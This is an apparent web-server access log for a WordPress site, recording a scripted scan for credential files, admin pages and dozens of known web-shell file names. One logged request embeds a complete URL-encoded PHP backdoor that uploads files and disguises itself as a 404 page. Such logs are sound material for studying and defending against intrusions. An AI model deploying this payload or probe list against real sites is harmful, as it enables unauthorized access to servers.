159.69.59.83 - - [02/Sep/2026:20:50:48 -0500] "GET /test/ HTTP/1.1" 500 2704 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:50:58 -0500] "GET /test/ HTTP/1.1" 404 51307 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:51:09 -0500] "GET /.well-known/ HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:20:51:18 -0500] "POST /wp-cron.php?doing_wp_cron=1788400278.2812728881835937500000 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:20:51:19 -0500] "GET /.well-known/ HTTP/1.1" 404 67675 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:51:29 -0500] "GET /members/login/ HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:51:39 -0500] "GET /members/login/ HTTP/1.1" 500 2704 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:51:55 -0500] "GET /post/wp-json/ HTTP/1.1" 500 2704 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:52:05 -0500] "GET /post/wp-json/ HTTP/1.1" 500 2704 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:52:57 -0500] "GET /Backoffice/ HTTP/1.1" 404 99410 "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:20:53:02 -0500] "POST /wp-cron.php?doing_wp_cron=1788400382.9213349819183349609375 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:20:53:14 -0500] "GET /blog/ HTTP/1.1" 200 43102 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:53:24 -0500] "GET /blog/ HTTP/1.1" 200 51297 "-" "python-requests/2.34.2"
120.133.60.156 - - [02/Sep/2026:20:53:39 -0500] "POST /wp-login.php HTTP/1.1" 500 2880 "https://effefe.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:20:53:48 -0500] "GET /2018/ HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:53:58 -0500] "GET /2018/ HTTP/1.1" 404 51307 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:54:12 -0500] "GET /admin/tmp/ HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:20:54:17 -0500] "POST /wp-cron.php?doing_wp_cron=1788400457.1178119182586669921875 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:20:54:22 -0500] "GET /admin/tmp/ HTTP/1.1" 404 51307 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:54:32 -0500] "GET /aws/credentials/ HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:54:42 -0500] "GET /aws/credentials/ HTTP/1.1" 500 2704 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:54:52 -0500] "GET /wls-wsat/CoordinatorPortType/ HTTP/1.1" 404 59480 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:55:05 -0500] "GET /wls-wsat/CoordinatorPortType/ HTTP/1.1" 404 51307 "-" "python-requests/2.34.2"
114.119.137.116 - - [02/Sep/2026:20:55:09 -0500] "GET /?id=667945.html HTTP/1.1" 200 64031 "http://www.effefe.com?id=667945.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
167.71.193.206 - - [02/Sep/2026:20:55:14 -0500] "GET /wp-admin/install.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
157.90.185.123 - - [02/Sep/2026:20:55:19 -0500] "POST /wp-cron.php?doing_wp_cron=1788400519.1324539184570312500000 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
157.90.185.123 - - [02/Sep/2026:20:55:37 -0500] "POST /wp-cron.php?doing_wp_cron=1788400537.8563001155853271484375 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
167.71.193.206 - - [02/Sep/2026:20:55:41 -0500] "GET /wp/wp-admin/install.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:20:55:53 -0500] "GET /Tmp/ HTTP/1.1" 500 2704 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:56:02 -0500] "GET /Tmp/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
167.71.193.206 - - [02/Sep/2026:20:56:08 -0500] "GET /wordpress/wp-admin/install.php HTTP/1.1" 504 247 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:20:56:34 -0500] "GET /wp-includes/ALFA_DATA/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
167.71.193.206 - - [02/Sep/2026:20:56:36 -0500] "GET /test/wp-admin/install.php HTTP/1.1" 504 247 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:20:56:44 -0500] "GET /wp-includes/ALFA_DATA/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:57:02 -0500] "GET /admin/uploads/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
167.71.193.206 - - [02/Sep/2026:20:57:05 -0500] "GET /backup/wp-admin/install.php HTTP/1.1" 504 247 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
114.119.148.64 - - [02/Sep/2026:20:57:13 -0500] "GET /?id=418116.html HTTP/1.1" 504 247 "http://www.effefe.com?id=418116.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
159.69.59.83 - - [02/Sep/2026:20:57:17 -0500] "GET /admin/uploads/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:20:57:33 -0500] "POST /wp-cron.php?doing_wp_cron=1788400653.9504210948944091796875 HTTP/1.1" 504 247 "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:20:58:46 -0500] "GET /credentials/credentials/ HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:58:56 -0500] "GET /credentials/credentials/ HTTP/1.1" 404 99636 "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:20:58:57 -0500] "POST /wp-cron.php?doing_wp_cron=1788400737.9670789241790771484375 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
114.119.144.15 - - [02/Sep/2026:20:59:34 -0500] "GET /?id=309217 HTTP/1.1" 200 64031 "http://www.effefe.com?id=309217" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
159.69.59.83 - - [02/Sep/2026:20:59:40 -0500] "GET /store/rss/ HTTP/1.1" 500 2704 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:20:59:51 -0500] "GET /store/rss/ HTTP/1.1" 301 - "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:20:59:55 -0500] "POST /wp-cron.php?doing_wp_cron=1788400794.9777569770812988281250 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:21:01:43 -0500] "GET /articles/wp-json/ HTTP/1.1" 404 51296 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:01:55 -0500] "GET /articles/wp-json/ HTTP/1.1" 404 51307 "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:21:01:58 -0500] "POST /wp-cron.php?doing_wp_cron=1788400918.2974059581756591796875 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:21:02:48 -0500] "GET /wp-json/ HTTP/1.1" 200 597944 "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:21:03:07 -0500] "POST /wp-cron.php?doing_wp_cron=1788400987.0923340320587158203125 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:21:03:10 -0500] "GET /wp-json/ HTTP/1.1" 200 73720 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:04:23 -0500] "GET /rss/ HTTP/1.1" 301 - "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:21:04:25 -0500] "POST /wp-cron.php?doing_wp_cron=1788401065.8890190124511718750000 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:21:04:26 -0500] "GET /feed/ HTTP/1.1" 200 1029 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:04:36 -0500] "GET /templates/beez3/ HTTP/1.1" 404 99410 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:04:43 -0500] "GET /plugins/ HTTP/1.1" 404 99410 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:04:51 -0500] "GET /mysql/ HTTP/1.1" 404 99410 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:05:00 -0500] "GET /blog/wp-json/ HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:05:10 -0500] "GET /blog/wp-json/ HTTP/1.1" 404 51307 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:05:41 -0500] "GET /wp-includes/PHPMailer/ HTTP/1.1" 403 199 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:05:20 -0500] "GET /dev/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:05:30 -0500] "GET /dev/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:21:05:33 -0500] "POST /wp-cron.php?doing_wp_cron=1788401133.6844389438629150390625 HTTP/1.1" 504 247 "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:21:05:43 -0500] "GET /users/sign_in/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:05:53 -0500] "GET /users/sign_in/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:06:04 -0500] "GET /wp-content/cgialfa/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:06:14 -0500] "GET /wp-content/cgialfa/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:06:50 -0500] "GET /wp-admin/includes/ HTTP/1.1" 403 199 "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:21:06:25 -0500] "POST /wp-cron.php?doing_wp_cron=1788401183.5822420120239257812500 HTTP/1.1" 504 247 "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:21:06:25 -0500] "GET /feeds/posts/default/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:06:35 -0500] "GET /feeds/posts/default/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:06:50 -0500] "GET /NEW/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:07:01 -0500] "GET /NEW/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:07:35 -0500] "GET /wp-json/wp/v2/users/ HTTP/1.1" 403 199 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:07:11 -0500] "GET /cms/adMInhtml_page/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:07:21 -0500] "GET /cms/adMInhtml_page/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:07:35 -0500] "GET /new/ HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:07:56 -0500] "GET /new/ HTTP/1.1" 404 51307 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:08:19 -0500] "GET /cms/ HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:08:30 -0500] "GET /cms/ HTTP/1.1" 404 99636 "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:21:08:35 -0500] "POST /wp-cron.php?doing_wp_cron=1788401315.2368979454040527343750 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:21:08:39 -0500] "GET /old-site/ HTTP/1.1" 404 99410 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:08:55 -0500] "GET /shop/ HTTP/1.1" 200 111153 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:07 -0500] "GET /bak/ HTTP/1.1" 404 99410 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:13 -0500] "GET /admin/images/slider/ HTTP/1.1" 301 - "-" "python-requests/2.34.2"
157.90.185.123 - - [02/Sep/2026:21:09:19 -0500] "POST /wp-cron.php?doing_wp_cron=1788401359.2958989143371582031250 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:21:09:20 -0500] "GET /slider-portfolio/ HTTP/1.1" 200 52161 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:30 -0500] "GET /admin/images/slider/ HTTP/1.1" 301 - "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:40 -0500] "GET /slider-portfolio/ HTTP/1.1" 200 113815 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:53 -0500] "GET /shell20220621.php HTTP/1.1" 404 99410 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:53 -0500] "GET /wp-content/includes/uploads/Va.php HTTP/1.1" 404 99410 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:53 -0500] "GET /nasgor.php HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:53 -0500] "GET /wp-mna.php HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:53 -0500] "GET /wp-content/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /wp-admin/shell.php HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /uploads/l.php HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /wp-includes/theme-cron.php HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /wp-admin/includes/class-wp-pagebuilders-9LlwKf.php HTTP/1.1" 404 43112 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /wp-includes/images/media/xwsoooo.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /anone.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /s_ne.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /wikindex.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /0byte.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /wp-content/plugins/cekidot/alf.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /6index.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /new.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:54 -0500] "GET /wp-content/languages/sidwso.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /new-index.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /wp-info.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /symlink.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /7yn.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /wp_class_datalib.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /images/c99.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /404.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /11index.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /V5.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /wp-admin/bala.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:55 -0500] "GET /RxR.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:56 -0500] "GET /qindex.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:56 -0500] "GET /site/wp-content/themes/seotheme/mar.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:56 -0500] "GET /ups.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:56 -0500] "GET /t.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:56 -0500] "GET /wp-content/plugins/widget-logic/mini.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:56 -0500] "GET /wp-content/themes/config.bak.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:56 -0500] "GET /w.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:57 -0500] "GET /mailer.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:57 -0500] "GET /sym403.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:57 -0500] "GET /wp-content/vuln.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:57 -0500] "GET /templates/protostar/index.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:57 -0500] "GET /www.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:57 -0500] "GET /wp-includes/about.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:57 -0500] "GET /wp-content/plugins/html404/wso25.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:57 -0500] "GET /wp-admin/includes/maint/wp-cron.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /8index.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /wp-includes/pomo/config.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /srx.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /wp-admin/wso.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /alfashell.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /goods.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /server.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /wp-includes/pomo/repair.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /wp-includes/css/wp-atom.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /wp-content/bala.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /xz.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /wp-admin/images/atomlib.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /.wp-cache.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /wp-includes/images/wp-blog.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /.well-known/leaf.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /uploads/s4.phtml HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /images/fx.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /3.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /kk.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:59 -0500] "GET /wp-includes/wso112233.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:59 -0500] "GET /wp-content/upgrade/wp-signup.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:59 -0500] "GET /lufix.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:59 -0500] "GET /wp-includes/pomo/wp-cli.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:59 -0500] "GET /V3.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:59 -0500] "GET /0.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:59 -0500] "GET /ws.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:59 -0500] "GET /wp-content/db-cache.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:09:59 -0500] "GET /alfa123.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /wp-22.php?sfilename=nyx.php&sfilecontent=%3C?php%20%0D%0Aerror_reporting(E_ERROR%20%7C%20E_PARSE);%0D%0Aif%20($_GET%5B%22pass%22%5D%20==%20%22nyxfallagatn%22)%7B%0D%0Aecho%20%22%3Cb%3ENyx_FallagaTeam%3C/b%3E%3Cbr%3E%22;%0D%0Aecho%20'%3Cb%3ESystem%20Info:%3C/b%3E%20'.php_uname();%0D%0Aecho%20'%3Cform%20action=%22%22%20method=%22post%22%20enctype=%22multipart/form-data%22%20name=%22uploader%22%20id=%22uploader%22%3E';%0D%0Aecho%20'%3Cinput%20type=%22file%22%20name=%22file%22%20size=%2250%22%3E%3Cinput%20name=%22_upl%22%20type=%22submit%22%20id=%22_upl%22%20value=%22Upload%22%3E%3C/form%3E';%0D%0Aif(%20$_POST%5B'_upl'%5D%20==%20%22Upload%22%20)%20%7B%0D%0Aif(@copy($_FILES%5B'file'%5D%5B'tmp_name'%5D,%20$_FILES%5B'file'%5D%5B'name'%5D))%20%7B%0D%0Aecho%20'%3Cb%3ESuccess!%3C/b%3E%3Cbr%3E%3Cbr%3E';%20%0D%0A%7Delse%20%7B%20echo%20'Failed!%3C/b%3E%3Cbr%3E%3Cbr%3E';%20%7D%7D%0D%0A%7Delse%7B%0D%0A$domain%20=%20$_SERVER%5B'SERVER_NAME'%5D;%0D%0Aecho'%3Chtml%3E%3Chead%3E%0D%0A%3Ctitle%3E404%20Not%20Found%3C/title%3E%0D%0A%3C/head%3E%3Cbody%3E%0D%0A%3Ch1%3ENot%20Found%3C/h1%3E%0D%0A%3Cp%3EThe%20requested%20URL%20was%20not%20found%20on%20this%20server.%3C/p%3E%0D%0A%3Chr%3E%0D%0A%3Caddress%3EApache/2.4.38%20(Ubuntu)%20Server%20at%20'.$domain.'%20Port%20443%3C/address%3E%0D%0A%3C/body%3E%3C/html%3E';%7D%0D%0A?%3E%0D%0A&supfiles=nyx.php&User-Agent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F108.0.0.0+Safari%2F537.36 HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /wp-includes/wp-red.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /templates/beez_20/error.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /h.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /wp-includes/991176.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /system_log.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /wp-includes/bala.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /files/image.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /xxx.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /uploads/up.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:00 -0500] "GET /mar.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /8.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /old-index.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
